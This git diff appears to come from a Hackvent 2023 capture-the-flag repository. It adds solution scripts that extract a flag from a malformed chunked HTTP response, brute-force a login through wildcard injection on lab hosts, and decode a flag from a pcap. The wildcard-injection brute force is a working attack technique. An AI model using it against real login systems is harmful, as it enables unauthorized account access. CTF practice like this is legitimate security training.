\Device\HarddiskVolume4\Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b78d50960 \Device\HarddiskVolume4\Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b79269d60 \$ConvertToNonresident 216 diff --git a/Day 6/memory.raw b/Day 6/memory.raw new file mode 100755 index 0000000..ebdbdf9 --- /dev/null +++ b/Day 6/memory.raw @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87 +size 2147483648 diff --git a/Day 6/wallpaper.png b/Day 6/wallpaper.png new file mode 100644 index 0000000..9394e82 Binary files /dev/null and b/Day 6/wallpaper.png differ diff --git a/Day 7/exploit.py b/Day 7/exploit.py new file mode 100644 index 0000000..48e9274 --- /dev/null +++ b/Day 7/exploit.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python + +# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit +# https://git.romanh.de/Roman/HackingScripts + +import os +import re +import sys +import json +import time +import base64 +import requests +import subprocess +import urllib.parse +import string +from bs4 import BeautifulSoup +from hackingscripts import util, rev_shell +from hackingscripts.fileserver import HttpFileServer + +import socket +from PIL import Image + +from urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land" +IP_ADDRESS = util.get_address() + +def get_image_bytes(): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((HOST, 80)) + sock.sendall(b"\n") + + data = b"" + + while True: + b = sock.recv(1024) + if not b: + break + + data += b + + body_offset = data.index(b"\n\n") # malformed here + header, body = data[:body_offset], data[body_offset+2:] + + return header, body + +if __name__ == "__main__": + + header, body = get_image_bytes() + + flag = "" + while body: + offset_index = body.index(b"\r\n") + chunk_size = int(body[0:offset_index], 16) + offset = offset_index + 2 + chunk = body[offset:offset+chunk_size] + body = body[offset+chunk_size+2:] + + if chunk_size > 0x900: + flag += chr(chunk_size & 0xFF) + + print("[+] Flag:", flag) diff --git a/Day 8/bask-source.zip b/Day 8/bask-source.zip new file mode 100644 index 0000000..76b8184 Binary files /dev/null and b/Day 8/bask-source.zip differ diff --git a/Day 8/exploit.py b/Day 8/exploit.py new file mode 100644 index 0000000..0ad0dbf --- /dev/null +++ b/Day 8/exploit.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python + +# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit +# https://git.romanh.de/Roman/HackingScripts + +import string +import os +import re +import sys +import json +import time +import base64 +import requests +import subprocess +import urllib.parse +from bs4 import BeautifulSoup +from hackingscripts import util, rev_shell +from hackingscripts.fileserver import HttpFileServer + +from urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" +IP_ADDRESS = util.get_address() + +def request(method, uri, **kwargs): + if not uri.startswith("/") and uri != "": + uri = "/" + uri + + client = requests + if "session" in kwargs: + client = kwargs["session"] + del kwargs["session"] + + if "allow_redirects" not in kwargs: + kwargs["allow_redirects"] = False + + if "verify" not in kwargs: + kwargs["verify"] = False + + if "proxies" not in kwargs: + kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"} + + return client.request(method, BASE_URL + uri, **kwargs) + +def login(password): + while True: + # post payload is not URL decoded, so we can't use dictionary + res = request("POST", "/login", data=f"password={password}") + if "Successfully logged in" in res.text: + return True + elif "Invalid username or password!" in res.text: + return False + +def retrieve_flag(cookie): + while True: + res = request("GET", "/admin", cookies={"admin_token": cookie}) + util.assert_content_type(res, "text/html") + if "You are not authorized to view this page." in res.text: + return None + else: + match = re.search(r"Your flag is: (HV23\{.*\})", res.text) + if match: + return match[1] + + +if __name__ == "__main__": + password = "salami" + flag = retrieve_flag(password) + while flag is None: + found = False + for x in string.printable: + if x in ["*", "\\"]: + continue + + if login(password + x + "*"): + password += x + found = True + flag = retrieve_flag(password) + break + + if not found: + break + + print("[+] Flag:", flag) \ No newline at end of file diff --git a/Day 9/decode.py b/Day 9/decode.py new file mode 100644 index 0000000..9e31ffd --- /dev/null +++ b/Day 9/decode.py @@ -0,0 +1,22 @@ +import os +import re +import datetime +from bs4 import BeautifulSoup +from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse + +if __name__ == "__main__": + + chars = [] + pcap_extractor = PcapExtractor("secret_capture.pcapng") + for response in pcap_extractor: + match = re.match(r"/\?door=(\d)", response.get_file_path()) + if match and isinstance(response, HttpResponse): + request = response.response_to + ip, port = request.socket.split(":") + port = int(port) + c = chr(port - 56700) + dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp() + chars.append((dt, c)) + + flag = "".join(entry[1] for entry in sorted(chars)) + print("[+] Flag:", flag) \ No newline at end of file diff --git a/Day 9/secret_capture.pcapng b/Day 9/secret_capture.pcapng new file mode 100644 index 0000000..fa65932 Binary files /dev/null and b/Day 9/secret_capture.pcapng differ